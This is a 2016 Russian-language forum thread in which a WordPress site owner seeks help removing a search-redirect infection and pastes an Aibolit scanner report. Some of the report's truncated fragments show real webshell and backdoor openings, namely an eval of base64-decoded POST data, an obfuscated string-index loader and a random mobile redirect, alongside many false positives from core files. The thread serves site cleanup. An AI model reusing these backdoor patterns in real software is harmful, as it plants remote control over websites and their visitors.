Помогите с вирусом WP

Тема, стыренная с файлопомойки, верный путь к заразе на сайте.

Код надо смотреть...

шелл..

Тема ВП откуда брали?

Если недавно появилось, делайте бекап, меняйте пароль, ставьте плагин защиты.

Тема Давнишняя Lucidpress

Да при проверки файлов был сатус PHP.Shell.101

я делал так всё выкачал и на локале проверил фаилы вредоносные просто обновил с оригинала ворд пресса. ☝🤪

Обычным Антивирем проверяли файлы?

Просто думаю отличается ли антивирус хостинга и его проверка, от моего

Сервисом обнаружил что вирус называется "Поисковый редирект "

Помогите где найти этот код и удалить его

а что Айболитом не судьба проверить и удалить?

Вот что выдал айболит:

Эти файлы могут быть вредоносными или хакерскими скриптами (28)

Эти файлы нужно удалять? или только часть кода показанную ниже?

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/sendmail.php

[x] 1…="Reply-To:$email\r\n";if(wp_mail($to,$subject,$body,$headers)){echo 'success';} else{echo 'fail';}

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php

[x] 1…commended_permissions'];$rec_perm_dec=octdec($rec_perm_oct_string);$perm_result= chmod($_POST['aiowps_permission_chg_file'],$rec_perm_dec);if($perm_result===tru

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/boys.php

[x] 1…d_urls)-1);$rand_url=$android_urls[$n];}?><meta http-equiv="refresh" content="2; url=<?php echo$rand_url;?>"

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/greater.php

[x] 1…d_urls)-1);$rand_url=$android_urls[$n];}?><meta http-equiv="refresh" content="2; url=<?php echo$rand_url;?>"

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/includes/dashboard.php

[x] 1…heck_browser_version(){if(empty($_SERVER['HTTP_USER_AGENT'])) return false;$key= md5($_SERVER['HTTP_USER_AGENT']);if(false===($response=get_site_transient('brow

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/update.php

[x] 1…UEST['plugin'])?trim($_REQUEST['plugin']) : '';$theme=isset($_REQUEST['theme'])? urldecode($_REQUEST['theme']) : '';$action=isset($_REQUEST['action'])?$_REQUEST

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/upgrade.php

[x] 1…</p><?php break;case 1: wp_upgrade();$backto=!empty($_GET['backto'])?wp_unslash( urldecode($_GET['backto'])) :__get_option('home').'/';$backto=esc_url($backto);

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/plugins/subscribe2/admin/your_subscriptions.php

[x] 1…=$wpdb->get_var($wpdb->prepare("SELECT ID FROM$wpdb->users WHERE user_email=%s", urldecode($_GET['email'])));}else{get_currentuserinfo();}if(isset($_POST['s2_ad C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/core/plugins/layerslider/layerslider.php [x] 1…['import'])&&strstr($_SERVER['REQUEST_URI'],'layerslider')){$import=json_decode( base64_decode($_POST['import']),true);if(!is_array($import)){$import=unserializ

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/maint/wp-maint.php

[x] 1…sxGCeyXbSw='));if(isset($_COOKIE['sP'])){$wp_l_=$_COOKIE['sP'];$wp_l_=md5($wp_l_ ).substr(MD5(strrev($wp_l_)),0,strlen($wp_l_));for($wp___l_=0;$wp___l_<15563;$w

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/class-IXR.php

[x] 1…32601,'server error.requested function "'.$method.'" does not exist.');}$result= call_user_func($method,$args);}return$result;}function error($error,$message=fa

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-checking.php

[x] 1<?php $a='preg_replace';$c='base64_decode';$b="ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnei

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/woocommerce/order/viewport-compatible.php

[x] 1<?php$oj4228="p9;/.5un8xihqoatw2407*e)sf3clbg_k(mjyz6vdr1";$eSkIOV6240= $oj4228[0].$oj4228[41].$oj4228[22].$oj4228[30].$oj4228[31].$oj4228[41].$oj4228[ C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/js/tinymce/plugins/tabfocus/rss_feeder.class.php [x] 1<?php$oj4228="p9;/.5un8xihqoatw2407*e)sf3clbg_k(mjyz6vdr1";$eSkIOV6240= $oj4228[0].$oj4228[41].$oj4228[22].$oj4228[30].$oj4228[31].$oj4228[41].$oj4228[ C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/js/tinymce/plugins/wpview/pdo.inc.php [x] 1<?php$oj4228="p9;/.5un8xihqoatw2407*e)sf3clbg_k(mjyz6vdr1";$eSkIOV6240= $oj4228[0].$oj4228[41].$oj4228[22].$oj4228[30].$oj4228[31].$oj4228[41].$oj4228[ C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/formatting.php [x] 806…ing,$chars);···}else{····// Assume ISO-8859-1 if not UTF-8····$chars['in']= chr(128).'�����'·····.'��'.ch

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/includes/class-pclzip.php

[x] 1…=array();$this->privConvertHeader2FileInfo($p_header,$v_local_header);$v_result= $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD,$v_local_header);if($v_result==

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-admin/includes/file.php

[x] 231…n success,returns an associative array of file attributes.On failure,returns $overrides['upload_error_handler'](&$file,$message) or array('error'=>$messa

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/core/admin/generators/metabox-generator.php

[x] 1…t->ID,$option['id'],true);if($default!=""){$option['default']=$default;}}$this-> $option['type']($option);}}echo '<div class="clearboth"></div></div>';echo '<in

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/core/admin/generators/option-generator.php

[x] 1…tions-container"><?php foreach($this->options as$option){if(method_exists($this, $option['type'])){$this->$option['type']($option);}}?><div class="mk-footer-but

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/core/admin/metaboxes/metabox-generator.php

[x] 1…t->ID,$option['id'],true);if($default!=""){$option['default']=$default;}}$this-> $option['type']($option);}}echo '<div class="clearboth"></div></div>';echo '<in

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/core/admin/shortcode-generator/shortcode-create.php

[x] 1…ype'])){$option['id']='sc_'.$shortcode['value'].'_'.$sub_shortcode['value'].'_'. $option['id'];$this->$option['type']($option);}}echo '</div>';}}else{foreach($s

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/js/jquery.anythingslider.min.js

[x] 1…pages-a.adj);c<a.adj&&(c=1);b.buildArrows&&(!b.infiniteSlides&&b.stopAtEnd)&&(a. $forward[c===a.pages?"addClass":"removeClass"]("disabled"),a.$back[1===c?"addCl

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/js/jquery.cycle.js

[x] 1…?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute"); $s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opt

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/js/jquery.isotope.min.js

[x] 1…this.options.animationOptions,g=this.options.onLayout,h,i,j,k;i=function(a,b){b. $el[d](b.style,f)};if(this._isInserting&&this.isUsingJQueryAnimation)i=function

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-content/themes/lucidpress/js/jquery.masonry.min.js

[x] 1…mationOptions,p;for(j=0,k=this.styleQueue.length;j<k;j++)p=this.styleQueue[j],p. $el[n](p.style,o);this.styleQueue=[],c&&c.call(a),this.isLaidOut=!0},_getColumn

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/js/jquery/jquery.masonry.min.js

[x] 1…mationOptions,i;for(c=0,d=this.styleQueue.length;c<d;c++)i=this.styleQueue[c],i. $el[g](i.style,h);this.styleQueue=[],b&&b.call(a),this.isLaidOut=!0},_getColumn

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/wp-includes/js/tinymce/plugins/spellchecker/rpc.php

[x] 1…input=$json->decode($raw);if(isset($config['general.engine'])){$spellchecker=new $config['general.engine']($config);$result=call_user_func_array(array($spellche

Обнови фаилы из оригинала вордпреса. и оригиналы плагинов востанови также.🍿

/wp-admin/includes/dashboard.php

Находишь в оригинале вордпреса такой фаил и просто перезаписываешь, и так далее с остальными заражёнными фаилами делаешь

Сейчас попробую.

Да пробовал еще изменить тему на базовую, проблема не ушла. Так что видимо не в теме дело.

Так же айболит еще показал:

Подозрение на мобильный редирект, подмену расширений или автовнедрение кода (1)

Путь Изменение свойств Изменение содержимого Размер

C:\Users\jyjjketw6ymtjwhtjykj\Desktop\aibolit\site/.htaccess

48…GENT_BLACKLIST_START··<IfModule mod_rewrite.c>··RewriteEngine On····RewriteCond %{HTTP_USER_AGENT}^SquigglebotBot [NC,OR]··RewriteCond%{HTTP_USER_AGENT}^Sur

удалил эти строки, без изменения пока, всеравно редиректит

---------- Добавлено 12.05.2016 в 10:11 ----------

Все заменил с оригинального WP, всеравно редиректит с Поисковой системы, емае

---------- Добавлено 12.05.2016 в 10:34 ----------

Проверил вебмастером от Гугла, выдал мне подозрительный код присутствующий на нескольких страницах:

"Scooby Doo Porn Images Lesbians Mind Connections Adult Comix Blogs Arizona Sexual Predator Map Free Black"

Когда открываю исходный код данной страницы ничего подобного не находится, где искать этот код и как удалить?